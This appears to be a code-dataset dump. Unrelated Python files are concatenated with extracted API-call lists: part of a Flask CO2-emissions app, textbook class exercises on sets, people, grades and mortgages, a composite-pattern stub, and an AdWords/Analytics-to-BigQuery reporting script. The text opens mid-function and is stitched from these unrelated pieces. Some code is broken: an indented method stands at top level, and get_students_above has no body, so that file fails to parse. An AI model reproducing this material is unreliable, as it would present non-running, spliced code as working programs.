        "<body><table><tr><th>Batiment</th><th>Emissions electricite (kgCO2)</th><th>Emissions gaz (kgCO2)</th></tr>",
    ]
    for row in total:
        # Shared cell tail: name | electricity | gas.
        cells = row[2] + "</td><td>" + str(row[0]) + "</td><td>" + str(row[1]) + "</td></tr>"
        if row[2] == "Total":
            # Four blank spacer rows before the bold grand-total row.
            parts.extend(["<tr><td> </td></tr>"] * 4)
            parts.append('<tr style="font-weight:bold"><td>' + cells)
        else:
            parts.append("<tr><td>" + cells)
    parts.append("</table>")
    parts.append('<form action="export" method="GET"><input type="submit" value="Export"></body>')
    return "".join(parts)
def get_data_per_building(service, year, region):
    """Return the DATA rows matching one service/year/region, or None.

    Fixed: the original returned a French error *string* for an unknown
    service, but the only caller (calculate_emissions) checks
    `if data is None` — so the string slipped through and crashed later.
    Returning None makes the contract match the caller.
    """
    if service not in SERVICE_TO_CODE:
        return None
    code = str(SERVICE_TO_CODE[service][1])
    # "Code bien" is matched by substring; year and region must match exactly.
    return DATA[(DATA["Code bien"].str.contains(code)) & (DATA["Année"] == year) & (DATA["Région"] == region)]
def calculate_emissions(service, year, region):
    """Compute per-building CO2 emissions plus a final "Total" row.

    Returns a list of [electricity_kgCO2, gas_kgCO2, building_name] rows,
    or an error string when no data is found for the service.
    """
    # Emission factors (kgCO2e per kWh consumed).
    electricite_emission = 0.0571  # kgCO2e/kWh
    gaz_emission = 0.227  # kgCO2e/kWh
    data = get_data_per_building(service, year, region)
    # print data
    if data is None:
        return "Les données n'étaient pas trouvé pour ce service dans ce région."
    total_donnee = data[["Consommation d'électricité (kWh)", "Consommation de gaz (kWh)", "Nom du bien"]]
    calcul_par_batiment = [[0, 0, ""] for x in range(len(data))]
    # Reindex from 0 so iterrows' idx lines up with calcul_par_batiment.
    total_donnee.reset_index(inplace=True, drop=True)
    for idx, row in total_donnee.iterrows():
        # Negative/missing consumption values are treated as zero emissions.
        if row[0] > 0:
            calcul_par_batiment[idx][0] = row[0] * electricite_emission
        if row[1] > 0:
            calcul_par_batiment[idx][1] = row[1] * gaz_emission
        calcul_par_batiment[idx][2] = row[2]
    # Column-wise sums via transpose.
    transpose = list(zip(*calcul_par_batiment))
    # NOTE(review): mixing numbers and "Total" in np.array coerces the whole
    # row to strings; downstream code only str()'s the values, so it works.
    total = np.array([sum(transpose[0]), sum(transpose[1]), "Total"])
    calcul_par_batiment.append(total)
    return calcul_par_batiment
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    app.run()
| [
"flask.render_template",
"pandas.read_csv",
"io.StringIO.StringIO",
"flask.Flask",
"csv.writer"
] | [((207, 222), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (212, 222), False, 'from flask import Flask\n'), ((304, 355), 'pandas.read_csv', 'pd.read_csv', (['"""Export_Deepki_Ready_dae.csv"""'], {'sep': '""","""'}), "('Export_Deepki_Ready_dae.csv', sep=',')\n", (315, 355), True, 'import pandas as pd\n'), ((265, 294), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (280, 294), False, 'from flask import render_template\n'), ((2028, 2050), 'io.StringIO.StringIO', 'io.StringIO.StringIO', ([], {}), '()\n', (2048, 2050), False, 'import io\n'), ((2064, 2078), 'csv.writer', 'csv.writer', (['si'], {}), '(si)\n', (2074, 2078), False, 'import csv\n')] |
# -*- coding: utf-8 -*-
# # Code from page 179
class Toy(object):
    """A toy container that accumulates elements supplied in lists."""

    def __init__(self):
        # Backing storage for every element ever added.
        self._elems = []

    def add(self, new_elems):
        """new_elems is a list; append its elements to self."""
        self._elems.extend(new_elems)

    def size(self):
        """Return how many elements have been added so far."""
        return len(self._elems)
# print(type(Toy))
# print(type(Toy.__init__), type(Toy.add), type(Toy.size))
# # Code from page 180
# t1 = Toy()
# print(type(t1))
# print(type(t1.add))
# t2 = Toy()
# print(t1 is t2) #test for object identity
# # Code from page 181
# t1 = Toy()
# t2 = Toy()
# t1.add([3, 4])
# t2.add([4])
# print(t1.size() + t2.size())
# # Figure 10-1 from page 182
class Int_set(object):
    """An Int_set is a set of integers"""
    #Information about the implementation (not the abstraction):
    #Value of a set is represented by a list of ints, self._vals.
    #Each int in a set occurs in self._vals exactly once.

    def __init__(self):
        """Create an empty set of integers"""
        self._vals = []

    def insert(self, e):
        """Assumes e is an integer and inserts e into self"""
        if e not in self._vals:
            self._vals.append(e)

    def member(self, e):
        """Assumes e is an integer
           Returns True if e is in self, and False otherwise"""
        return e in self._vals

    def remove(self, e):
        """Assumes e is an integer and removes e from self
           Raises ValueError if e is not in self"""
        # list.remove only raises ValueError, so catch that specifically
        # (the original bare except would also mask unrelated errors).
        try:
            self._vals.remove(e)
        except ValueError:
            raise ValueError(str(e) + ' not found')

    def get_members(self):
        """Returns a list containing the elements of self._
           Nothing can be assumed about the order of the elements"""
        return self._vals[:]

    def union(self, other):
        """other is an Int_set
           mutates self so that it contains exactly the elemnts in self
           plus the elements in other."""
        # Fixed: the original stub had no body, so union() silently did
        # nothing. insert() already enforces the no-duplicates invariant.
        for e in other.get_members():
            self.insert(e)

    def __str__(self):
        """Returns a string representation of self"""
        if self._vals == []:
            return '{}'
        self._vals.sort()
        result = ''
        for e in self._vals:
            result = result + str(e) + ','
        return f'{{{result[:-1]}}}'
# # Code from page 183
# s = Int_set()
# s.insert(3)
# print(s.member(3))
# # Code from page 184
# s = Int_set()
# s.insert(3)
# s.insert(4)
# print(str(s))
# print('The value of s is', s)
# # Header for finger exercise on page 184
def union(self, other):
    """other is an Int_set
    mutates self so that it contains exactly the elemnts in self
    plus the elements in other.

    Implemented via the public interface only: `self` just needs insert()
    and `other` get_members(), so any Int_set-like object works.
    (The original finger-exercise stub had no body and did nothing.)
    """
    for e in other.get_members():
        self.insert(e)
# # Figure 10-2 on page 185
class Toy(object):
    """Toy container demonstrating dunder (magic-method) overloading."""

    def __init__(self):
        self._elems = []

    def add(self, new_elems):
        """new_elems is a list; append its elements to self."""
        self._elems += new_elems

    def __len__(self):
        """Number of elements added so far."""
        return len(self._elems)

    def __add__(self, other):
        """Return a new Toy holding self's elements followed by other's."""
        combined = Toy()
        combined._elems = [*self._elems, *other._elems]
        return combined

    def __eq__(self, other):
        """Value equality: same elements in the same order."""
        return self._elems == other._elems

    def __str__(self):
        return str(self._elems)

    def __hash__(self):
        # Identity-based hash: lets Toy instances serve as dict keys even
        # though __eq__ is value-based (equal Toys may hash differently).
        return id(self)
# t1 = Toy()
# t2 = Toy()
# t1.add([1, 2])
# t2.add([3, 4])
# t3 = t1 + t2
# print('The value of t3 is', t3)
# print('The length of t3 is', len(t3))
# d = {t1: 'A', t2: 'B'}
# print('The value', d[t1], 'is associated with the key t1 in d.')
# # Import used for class Person
import datetime
# # Figure 10-3 from page 189
class Person(object):
    """A person with a full name, an optional birthday, and ordering by
    last name (falling back to full name on ties)."""

    def __init__(self, name):
        """Assumes name a string. Create a person"""
        self._name = name
        # str.rindex raises ValueError when there is no blank: in that case
        # the whole name doubles as the last name (e.g. 'Madonna').
        try:
            last_blank = name.rindex(' ')
            self._last_name = name[last_blank+1:]
        except ValueError:
            self._last_name = name
        # Fixed: the original set `self.birthday`, but every other method
        # uses `self._birthday`, so get_age() raised AttributeError instead
        # of the intended ValueError when no birthday had been set.
        self._birthday = None

    def get_name(self):
        """Returns self's full name"""
        return self._name

    def get_last_name(self):
        """Returns self's last name"""
        return self._last_name

    def set_birthday(self, birthdate):
        """Assumes birthdate is of type datetime.date
        Sets self's birthday to birthdate"""
        self._birthday = birthdate

    def get_age(self):
        """Returns self's current age in days
        Raises ValueError if no birthday has been set"""
        if self._birthday is None:
            raise ValueError
        return (datetime.date.today() - self._birthday).days

    def __lt__(self, other):
        """Assume other a Person
        Returns True if self precedes other in alphabetical
        order, and False otherwise. Comparison is based on last
        names, but if these are the same full names are
        compared."""
        if self._last_name == other._last_name:
            return self._name < other._name
        return self._last_name < other._last_name

    def __str__(self):
        """Returns self's name"""
        return self._name
# # Code from page 188
# me = Person('<NAME>')
# him = Person('<NAME>')
# her = Person('Madonna')
# print(him.get_last_name())
# him.set_birthday(datetime.date(1961, 8, 4))
# her.set_birthday(datetime.date(1958, 8, 16))
# print(him.get_name(), 'is', him.get_age(), 'days old')
# # Code from page 190
# p_list = [me, him, her]
# for p in p_list:
# print(p)
# p_list.sort()
# for p in p_list:
# print(p)
# # Figure 10-4 from page 192
class MIT_person(Person):
    """A Person carrying a unique, monotonically increasing id number."""

    _next_id_num = 0  # identification number handed to the next instance

    def __init__(self, name):
        """Create an MIT person and assign the next free id number."""
        super().__init__(name)
        self._id_num = MIT_person._next_id_num
        MIT_person._next_id_num = self._id_num + 1

    def get_id_num(self):
        """Return the id number assigned at creation time."""
        return self._id_num

    def __lt__(self, other):
        """Order MIT persons by id number, i.e. by creation order."""
        return self._id_num < other._id_num
# # Code from page 192
# p1 = MIT_person('<NAME>')
# print(str(p1) + '\'s id number is ' + str(p1.get_id_num()))
# # Code from page 193
# Code from page 193: three MIT persons created in order (so their id
# numbers increase) plus one plain Person. Comparing p1 < p4 would call
# MIT_person.__lt__, which reads other._id_num — an attribute p4 lacks.
p1 = MIT_person('<NAME>')
p2 = MIT_person('<NAME>')
p3 = MIT_person('<NAME>')
p4 = Person('<NAME>')
# print('p1 < p2 =', p1 < p2)
# print('p3 < p2 =', p3 < p2)
# print('p4 < p1 =', p4 < p1)
# print('p1 < p4 =', p1 < p4)
# Finger exercise from page 194
class Politician(Person):
    """ A politician is a person that can belong to a political party"""

    def __init__(self, name, party=None):
        """name and party are strings; party is None when the politician
        belongs to no party."""
        super().__init__(name)
        self._party = party

    def get_party(self):
        """returns the party to which self belongs (None if unaffiliated)"""
        return self._party

    def might_agree(self, other):
        """returns True if self and other belong to the same party
        or at least one of them does not belong to a party"""
        return (self._party is None or other._party is None
                or self._party == other._party)
# # Figure 10-5 from page 194
class Student(MIT_person):
    # Common abstract base for UG and Grad; adds no behavior of its own.
    pass
class UG(Student):
    def __init__(self, name, class_year):
        """name a string, class_year the expected graduation year (an int)."""
        super().__init__(name)
        self._year = class_year
    def get_class(self):
        """Return the class year of self."""
        return self._year
class Grad(Student):
    # A graduate student; distinguished from UG only by its type.
    pass
# # Code from page 195
# p5 = Grad('<NAME>')
# p6 = UG('<NAME>', 1984)
# print(p5, 'is a graduate student is', type(p5) == Grad)
# print(p5, 'is an undergraduate student is', type(p5) == UG)
# # Code from page 195 -- Should be added to class MIT_Person
    def is_student(self):
        """Return True iff self is an instance of Student (or a subclass).
        Code from page 195 -- intended to be added to class MIT_person."""
        return isinstance(self, Student)
# print(p5, 'is a student is', p5.is_student())
# print(p6, 'is a student is', p6.is_student())
# print(p3, 'is a student is', p3.is_student())
# # Code from page 196
class Transfer_student(Student):
    def __init__(self, name, from_school):
        """name and from_school are strings."""
        # Calls MIT_person.__init__ directly (bypassing Student, which adds
        # nothing of its own) so the student still gets an id number.
        MIT_person.__init__(self, name)
        self._from_school = from_school
    def get_old_school(self):
        """Return the school self transferred from."""
        return self._from_school
# # Figure 10-6 from page 198
class Grades(object):
    """A mutable mapping from students to lists of grades."""

    def __init__(self):
        """Create empty grade book"""
        self._students = []     # list of Student, kept sorted lazily
        self._grades = {}       # id number -> list of grades
        self._is_sorted = True  # True while _students is known to be sorted

    def add_student(self, student):
        """Assumes: student is of type Student.
        Add student to the grade book.
        Raises ValueError if the student was already added."""
        if student in self._students:
            raise ValueError('Duplicate student')
        self._students.append(student)
        self._grades[student.get_id_num()] = []
        self._is_sorted = False

    def add_grade(self, student, grade):
        """Assumes: grade is a float.
        Add grade to the list of grades for student.
        Raises ValueError if the student is not in the grade book."""
        try:
            self._grades[student.get_id_num()].append(grade)
        except KeyError:  # was a bare except, which also hid unrelated bugs
            raise ValueError('Student not in mapping')

    def get_grades(self, student):
        """Return a list of grades for student (a copy, safe to mutate).
        Raises ValueError if the student is not in the grade book."""
        try:
            return self._grades[student.get_id_num()][:]
        except KeyError:  # was a bare except
            raise ValueError('Student not in mapping')

    def get_students(self):
        """Return a sorted list of the students in the grade book
        (a copy, safe to mutate)."""
        if not self._is_sorted:
            self._students.sort()
            self._is_sorted = True
        return self._students[:]
# def get_students(self): #new version from later in chapter
# """Return the students in the grade book one at a time
# in alphabetical order"""
# if not self._is_sorted:
# self._students.sort()
# self._is_sorted = True
# for s in self._students:
# yield s
# # Code from page 197
# course = Grades()
# course.add_student(Grad('Bernie'))
# all_students = course.get_students()
# all_students.append(Grad('Liz'))
# # Figure 10-7 from page 199
def grade_report(course):
    """Assumes course is of type Grades.
    Return a multi-line report with each student's mean grade (or a
    'has no grades' line for students without any grades)."""
    report = ''
    for student in course.get_students():
        grades = course.get_grades(student)
        if grades:
            average = sum(grades) / len(grades)
            report = f"{report}\n{student}'s mean grade is {average}"
        else:
            report = f"{report}\n{student} has no grades"
    return report
# ug1 = UG('<NAME>', 2021)
# ug2 = UG('<NAME>', 2041)
# ug3 = UG('<NAME>', 2003)
# g1 = Grad('<NAME>')
# g2 = Grad('<NAME>')
# six_hundred = Grades()
# six_hundred.add_student(ug1)
# six_hundred.add_student(ug2)
# six_hundred.add_student(g1)
# six_hundred.add_student(g2)
# for s in six_hundred.get_students():
# six_hundred.add_grade(s, 75)
# six_hundred.add_grade(g1, 25)
# six_hundred.add_grade(g2, 100)
# six_hundred.add_student(ug3)
# print(grade_report(six_hundred))
# # Figure 10-8 from page 201
class info_hiding(object):
    """Demonstrates Python's name mangling: identifiers that begin with two
    underscores (and do not end with two) are rewritten inside the class
    body to _info_hiding__name."""
    def __init__(self):
        self.visible = 'Look at me'
        self.__also_visible__ = 'Look at me too'  # dunder-suffixed: NOT mangled
        self.__invisible = 'Don\'t look at me directly'  # mangled attribute
    def print_visible(self):
        print(self.visible)
    def print_invisible(self):
        # Works: mangling is applied consistently inside the defining class.
        print(self.__invisible)
    def __print_invisible(self):
        # The method name itself is mangled; callers outside the class would
        # have to use _info_hiding__print_invisible.
        print(self.__invisible)
    def __print_invisible__(self):
        # Dunder-suffixed method name is not mangled, so this is callable.
        print(self.__invisible)
# # Code from page 201
# test = info_hiding()
# print(test.visible)
# print(test.__also_visible__)
# print(test.__invisible)
# test = info_hiding()
# test.print_invisible()
# test.__print_invisible__()
# test.__print_invisible()
# # Code from page 202
class Sub_class(info_hiding):
    # Shows that mangling is per-class: here __invisible becomes
    # _Sub_class__invisible, which no instance has, so calling
    # new_print_invisible raises AttributeError.
    def new_print_invisible(self):
        print(self.__invisible)
# test_sub = Sub_class()
# test_sub.new_print_invisible()
# # Figure 10-9 from page 204 is embedded as a comment in code for Figue 10-7
# # Code from page 205
# book = Grades()
# book.add_student(Grad('Julie'))
# book.add_student(Grad('Lisa'))
# for s in book.get_students():
# print(s)
# # Finger exercise from page 205
def get_students_above(self, grade):
"""Return the students a mean grade > g one at a time"""
# # Figure 10-10 from page 208
def find_payment(loan, r, m):
    """Assumes: loan and r are floats, m an int.
    Returns the monthly payment for a mortgage of size
    loan at a monthly rate of r for m months (standard annuity formula)."""
    growth = (1 + r)**m  # compound growth factor over the life of the loan
    return loan*((r*growth)/(growth - 1))
class Mortgage(object):
    """Abstract class for building different kinds of mortgages."""

    def __init__(self, loan, ann_rate, months):
        """Assumes: loan and ann_rate are floats, months an int.
        Creates a new mortgage of size loan, duration months, and
        annual rate ann_rate."""
        self._loan = loan
        self._rate = ann_rate/12    # monthly rate
        self._months = months
        self._paid = [0.0]          # payment history; dummy entry for month 0
        self._outstanding = [loan]  # balance history, one entry per month
        self._payment = find_payment(loan, self._rate, months)
        self._legend = None         # description of mortgage, set by subclasses

    def make_payment(self):
        """Make a payment"""
        self._paid.append(self._payment)
        interest = self._outstanding[-1]*self._rate
        reduction = self._payment - interest
        self._outstanding.append(self._outstanding[-1] - reduction)

    def get_total_paid(self):
        """Return the total amount paid so far"""
        return sum(self._paid)

    def __str__(self):
        return self._legend
# Figure 10-11 from page 211
class Fixed(Mortgage):
    # A conventional fixed-rate mortgage with no points.
    def __init__(self, loan, r, months):
        Mortgage.__init__(self, loan, r, months)
        self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
    # A fixed-rate mortgage where `pts` percent of the loan is paid up front.
    def __init__(self, loan, r, months, pts):
        Mortgage.__init__(self, loan, r, months)
        self._pts = pts
        # The points are recorded as a payment made at closing (month 0).
        self._paid = [loan*(pts/100)]
        self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
    # An adjustable mortgage: a low teaser rate for teaser_months, then
    # rate r for the remainder of the loan.
    def __init__(self, loan, r, months, teaser_rate, teaser_months):
        Mortgage.__init__(self, loan, teaser_rate, months)
        self._teaser_months = teaser_months
        self._teaser_rate = teaser_rate
        self._nextRate = r/12  # monthly rate after the teaser period ends
        self._legend = (f'{100*teaser_rate:.1f}% for ' +
                        f'{self._teaser_months} months, then {100*r:.1f}%')
    def make_payment(self):
        # _paid holds a dummy entry for month 0, so this fires on the first
        # payment after the teaser period ends.
        if len(self._paid) == self._teaser_months + 1:
            self._rate = self._nextRate
            # Re-amortize the remaining balance over the remaining months.
            self._payment = find_payment(self._outstanding[-1],
                                         self._rate,
                                         self._months - self._teaser_months)
        Mortgage.make_payment(self)
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
                      var_rate1, var_rate2, var_months):
    """Simulate the three mortgage kinds month by month and print, for each,
    its legend and the total amount paid over the life of the loan."""
    tot_months = years*12
    fixed1 = Fixed(amt, fixed_rate, tot_months)
    fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
    two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1,
                        var_months)
    morts = [fixed1, fixed2, two_rate]
    # Advance every mortgage one month at a time for the full term.
    for _ in range(tot_months):
        for mort in morts:
            mort.make_payment()
    # Report (the original reused the loop variable `m` for both loops).
    for mort in morts:
        print(mort)
        print(f' Total payments = ${mort.get_total_paid():,.0f}')
# # Code from page 210
# compare_mortgages(amt=200000, years=30, fixed_rate=0.035,
# pts = 2, pts_rate=0.03, var_rate1=0.03,
# var_rate2=0.05, var_months=60)
| [
"datetime.date.today"
] | [((4324, 4345), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4343, 4345), False, 'import datetime\n')] |
"""
组合模式
"""
from DataStructure.Link import FavoritesList
if __name__ == '__main__':
_favorites_list = FavoritesList()
| [
"DataStructure.Link.FavoritesList"
] | [((109, 124), 'DataStructure.Link.FavoritesList', 'FavoritesList', ([], {}), '()\n', (122, 124), False, 'from DataStructure.Link import FavoritesList\n')] |
import adwords_pull
import analytics_pull
import process_xml
import match_maker
import csv_parser
import pandas
import pandasql
import datetime
import google_auth
from google.cloud import bigquery
from datetime import date
from dateutil.relativedelta import relativedelta, SU,MO,TU,WE,TH,FR,SA
import pprint
from currency_converter import CurrencyConverter
def main():
    """Pull the last four full weeks of AdWords and Analytics data, join
    them per product/week, keep only products whose ROAS declined by more
    than DECLINE_PERCENT between the first and last week, and append the
    result to a BigQuery table.

    NOTE(review): side effects include network calls to both APIs, a local
    CSV dump ('analytics_after_proc.csv') and a BigQuery append.
    """
    DECLINE_PERCENT = 0.5 #50% - Change this to fit your needs - the higher it is, the less results you will get.
    c = CurrencyConverter()
    #Get the individual days to pull (for Analytics to avoid data sampling) and to get the start and end date for adwords
    FourWeekList = FourWeekCreate()
    FourWeekList.sort()
    START_WEEK = int(FourWeekList[0].strftime("%W")) + 1
    END_WEEK = int(FourWeekList[-1].strftime("%W")) + 1
    START_DATE = str(FourWeekList[0])
    END_DATE = str(FourWeekList[-1])
    #ADWORDS PULL API
    adwordsCSV = adwords_pull.ProductDecline(START_DATE,END_DATE)
    adwordsDF = csv_parser.parseToCSV(adwordsCSV,"ADW")
    print("Adwords API Pull Complete")
    #ANALYTIS PULL API
    # One request per day keeps Google Analytics from sampling the data.
    analyticsCSV = ""
    for day in FourWeekList:
        analyticsCSV += analytics_pull.main(str(day))
        print("Pulled date: " + str(day))
    print("Analytics API Pull Complete")
    dfAnalytics = csv_parser.parseToCSV(analyticsCSV,"ANL")
    dfAnalytics['productName'] = dfAnalytics['productName'].str.lower()
    # Rows whose date cannot be parsed are flagged with -1 and dropped.
    dfAnalytics['date'] = dfAnalytics.apply(lambda row: match_maker.CheckDateFormatAnalytics(row), axis=1)
    dfAnalytics = dfAnalytics[dfAnalytics.date != -1]
    #ADD WEEK AND YEAR NUMBERS
    adwordsDF['yearNum'] = adwordsDF.apply(lambda row: match_maker.ApplyYear(row), axis=1)
    adwordsDF['weekNum'] = adwordsDF.apply(lambda row: match_maker.ApplyWeek(row), axis=1)
    dfAnalytics['yearNum'] = dfAnalytics.apply(lambda row: match_maker.ApplyYear(row,"ANL"), axis=1)
    dfAnalytics['weekNum'] = dfAnalytics.apply(lambda row: match_maker.ApplyWeek(row,"ANL"), axis=1)
    #REMOVE THE SPACE AFTER THE GID
    GIDnew = []
    for index, row in adwordsDF.iterrows():
        newGID = row['GID'].partition(" ")[0]
        GIDnew.append(newGID)
    adwordsDF=adwordsDF.drop(columns="GID")
    adwordsDF.loc[:,"GID"] = GIDnew
    #GET ALL THE GIDs THAT CLICKS SUM UP TO 400+ OVER THE 4 WEEK PERIOD
    sqlAdwordsPD = '''
    SELECT
    GID,
    SUM(Clicks) as Clicks
    FROM adwordsDF
    GROUP BY GID
    '''
    incGIDdf = pandasql.sqldf(sqlAdwordsPD, locals())
    sqlAdwordsPD = '''
    SELECT
    GID
    FROM incGIDdf
    WHERE Clicks > 400
    '''
    incGIDdf = pandasql.sqldf(sqlAdwordsPD, locals())
    #NOW WE HAVE A LIST OF GIDs THAT HAVE MORE THAN 400 CLICKS IN THE 4 WEEK PERIOD
    #GROUP THE ORIGINAL ADWORDS DF!
    sqlAdwordsPD = '''
    SELECT
    yearNum,
    weekNum,
    GID,
    SUM(Impressions) as Impressions,
    SUM(Clicks) as Clicks,
    Sum(Cost) as Cost,
    Account,
    SUM(ConversionValue) as ConversionValue
    FROM adwordsDF
    GROUP BY GID,Account,weekNum,yearNum
    '''
    # WRITE TO DF
    adwordsDF = pandasql.sqldf(sqlAdwordsPD, locals())
    #Filter the dataframe to only contain the GIDs that were found using the SQL
    cols = adwordsDF.columns[adwordsDF.columns.isin(['GID'])]
    adwordsDFnew = pandas.DataFrame()
    for index,row in incGIDdf.iterrows():
        adwordsDFnew = adwordsDFnew.append(adwordsDF[(adwordsDF[cols] == row['GID']).all(1)])
    adwordsDF.iloc[0:0]
    # adwordsDFnew now holds the weekly numbers of the products that add to over 400 clicks in the period when combined
    #Slim down the analytics data and group it together whhile summing up the values
    #This is repeated code, but im putting it here again incase there are different metrics people want for this slide specifically
    sqlGroupAnalytics = '''
    SELECT dfAnalytics.productName as productName,
    dfAnalytics.productSku as productSku,
    dfAnalytics.country as country,
    dfAnalytics.weekNum as weekNum,
    dfAnalytics.yearNum as yearNum,
    SUM(dfAnalytics.itemRevenue) as itemRevenue,
    AVG(dfAnalytics.buyToDetailRate) as buyToDetailRate
    FROM dfAnalytics
    WHERE dfAnalytics.country = "United States"
    GROUP BY dfAnalytics.country, dfAnalytics.productSku, dfAnalytics.productName, dfAnalytics.weekNum , dfAnalytics.yearNum
    '''
    dfAnalytics = pandasql.sqldf(sqlGroupAnalytics, locals())
    dfAnalytics.to_csv('analytics_after_proc.csv')
    #Match analytics onto adwords DFs
    #This is repeated code, but im putting it here again incase there are different metrics people want for this slide specifically
    sql = '''
    SELECT adwordsDFnew.GID as ID,
    adwordsDFnew.Impressions as Impressions,
    adwordsDFnew.Cost as Cost,
    adwordsDFnew.Clicks as Clicks,
    adwordsDFnew.ConversionValue as ConversionValue,
    dfAnalytics.itemRevenue as itemRev,
    dfAnalytics.buyToDetailRate as buyToDetailRate,
    MIN(dfAnalytics.productName) as productName,
    dfAnalytics.country as country,
    dfAnalytics.weekNum as weekNum,
    dfAnalytics.yearNum as yearNum
    FROM adwordsDFnew
    INNER JOIN dfAnalytics
    ON (LOWER(adwordsDFnew.GID) = LOWER(dfAnalytics.productSku)
    and adwordsDFnew.weekNum = dfAnalytics.weekNum
    and adwordsDFnew.yearNum = dfAnalytics.yearNum
    )
    GROUP BY ID,Impressions,Cost,Clicks,ConversionValue,itemRev,buyToDetailRate,country,dfAnalytics.weekNum,dfAnalytics.yearNum
    ORDER BY adwordsDFnew.GID, dfAnalytics.weekNum
    '''
    dfAnalytics.iloc[0:0]
    dfFinal = pandasql.sqldf(sql, locals())
    dfFinal = dfFinal[dfFinal.productName != '(not set)'] #This specific client has anomolies in the data, its just repeating so we remove it
    ####### CONVERT CURRENCY START ########
    #COMMENT OUT THE BELOW IF YOU DONT NEED TO CONVERT CURRENCY - Adjust variable names accordingly
    newCost = []
    newROAS = []
    for dfFinalIndex, dfFinalRow in dfFinal.iterrows():
        newVal = c.convert(dfFinalRow['Cost'] / 1000000, 'USD', 'YOUR_CURRENCY') #div by 1Million as google provides the cost in this format
        newCost.append(newVal)
        if float(newVal) <= 0:
            newROAS.append(0)
        else:
            newROAS.append(float(dfFinalRow['itemRev']) / float(newVal))
    dfFinal.loc[:,"newCost"] = newCost
    dfFinal.loc[:,"newROAS"] = newROAS
    ####### CONVERT CURRENCY END ########
    #NOW FILTER OUT ONES WITHOUTH 4 RECORDS - Keep things simple
    for index,row in incGIDdf.iterrows():
        sqlGetGID = '''
        SELECT *
        FROM dfFinal
        WHERE ID = "''' + str(row['GID']) + '''"
        ORDER BY weekNum ASC
        '''
        tempDF = pandasql.sqldf(sqlGetGID, locals()) #this should contain the 4 weeks (or less)
        if(len(tempDF.index) != 4): #doesnt have all data : remove
            dfFinal = dfFinal[dfFinal.ID != str(row['GID'])]
        else:
            START_WK_ROAS = tempDF['newROAS'].iloc[0]
            END_WK_ROAS = tempDF['newROAS'].iloc[3]
            if float(END_WK_ROAS) >= float(float(START_WK_ROAS) * DECLINE_PERCENT): #IS NOT IN DECLINE
                #NOT IN DECLINE SO REMOVE FROM LIST
                dfFinal = dfFinal[dfFinal.ID != str(row['GID'])] # remove the rows wwhere the ID is the current one
    #Whatever is left over now are the products in decline
    dfFinal = dfFinal.sort_values(by=['ID','weekNum'])
    dfFinal["WeekRange"] = str(START_WEEK) + ' - ' + str(END_WEEK) + " - " + str(START_DATE) + " - " + str(END_DATE)
    #dfFinal.to_csv('dfFinal.csv')
    dfFinal.to_gbq('DATASET_NAME.TABLE_NAME',
                   project_id='YOUR_PROJECT_ID',
                   chunksize=None,
                   if_exists='append',
                   table_schema=None,
                   location='LOCATION',
                   progress_bar=True,
                   credentials=google_auth.getCreds())
    print("Success!")
def FourWeekCreate():
    """Return the 28 dates (Mon-Sun) of the four most recent complete weeks.

    The script is scheduled to run on Mondays, which is why the Monday
    lookback starts one week further back than the other weekdays: it must
    land on *last* Monday, never on today.

    Reimplemented with plain stdlib datetime arithmetic; the previous
    version used dateutil.relativedelta (weekday=MO(-2-i), TU(-1-i), ...)
    to compute exactly the same dates.
    """
    def _weeks_ago(day, target_weekday, weeks_back):
        # Most recent date on or before `day` falling on `target_weekday`
        # (0=Mon .. 6=Sun), then a further `weeks_back - 1` whole weeks back.
        days_back = (day.weekday() - target_weekday) % 7
        return day - datetime.timedelta(days=days_back, weeks=weeks_back - 1)

    today = date.today()
    weekArr = []
    for i in range(4):
        # Monday used offset -2 - i in the dateutil code => 2 + i weeks back.
        weekArr.append(_weeks_ago(today, 0, 2 + i))
        for target_weekday in range(1, 7):  # Tue(1) .. Sun(6)
            weekArr.append(_weeks_ago(today, target_weekday, 1 + i))
    return weekArr
if __name__ == "__main__":
main() | [
"google_auth.getCreds",
"csv_parser.parseToCSV",
"adwords_pull.ProductDecline",
"match_maker.CheckDateFormatAnalytics",
"dateutil.relativedelta.WE",
"dateutil.relativedelta.TH",
"dateutil.relativedelta.MO",
"dateutil.relativedelta.SU",
"match_maker.ApplyYear",
"dateutil.relativedelta.FR",
"dateu... | [((496, 515), 'currency_converter.CurrencyConverter', 'CurrencyConverter', ([], {}), '()\n', (513, 515), False, 'from currency_converter import CurrencyConverter\n'), ((927, 976), 'adwords_pull.ProductDecline', 'adwords_pull.ProductDecline', (['START_DATE', 'END_DATE'], {}), '(START_DATE, END_DATE)\n', (954, 976), False, 'import adwords_pull\n'), ((992, 1032), 'csv_parser.parseToCSV', 'csv_parser.parseToCSV', (['adwordsCSV', '"""ADW"""'], {}), "(adwordsCSV, 'ADW')\n", (1013, 1032), False, 'import csv_parser\n'), ((1307, 1349), 'csv_parser.parseToCSV', 'csv_parser.parseToCSV', (['analyticsCSV', '"""ANL"""'], {}), "(analyticsCSV, 'ANL')\n", (1328, 1349), False, 'import csv_parser\n'), ((3288, 3306), 'pandas.DataFrame', 'pandas.DataFrame', ([], {}), '()\n', (3304, 3306), False, 'import pandas\n'), ((8022, 8034), 'datetime.date.today', 'date.today', ([], {}), '()\n', (8032, 8034), False, 'from datetime import date\n'), ((1477, 1518), 'match_maker.CheckDateFormatAnalytics', 'match_maker.CheckDateFormatAnalytics', (['row'], {}), '(row)\n', (1513, 1518), False, 'import match_maker\n'), ((1669, 1695), 'match_maker.ApplyYear', 'match_maker.ApplyYear', (['row'], {}), '(row)\n', (1690, 1695), False, 'import match_maker\n'), ((1760, 1786), 'match_maker.ApplyWeek', 'match_maker.ApplyWeek', (['row'], {}), '(row)\n', (1781, 1786), False, 'import match_maker\n'), ((1855, 1888), 'match_maker.ApplyYear', 'match_maker.ApplyYear', (['row', '"""ANL"""'], {}), "(row, 'ANL')\n", (1876, 1888), False, 'import match_maker\n'), ((1956, 1989), 'match_maker.ApplyWeek', 'match_maker.ApplyWeek', (['row', '"""ANL"""'], {}), "(row, 'ANL')\n", (1977, 1989), False, 'import match_maker\n'), ((7940, 7962), 'google_auth.getCreds', 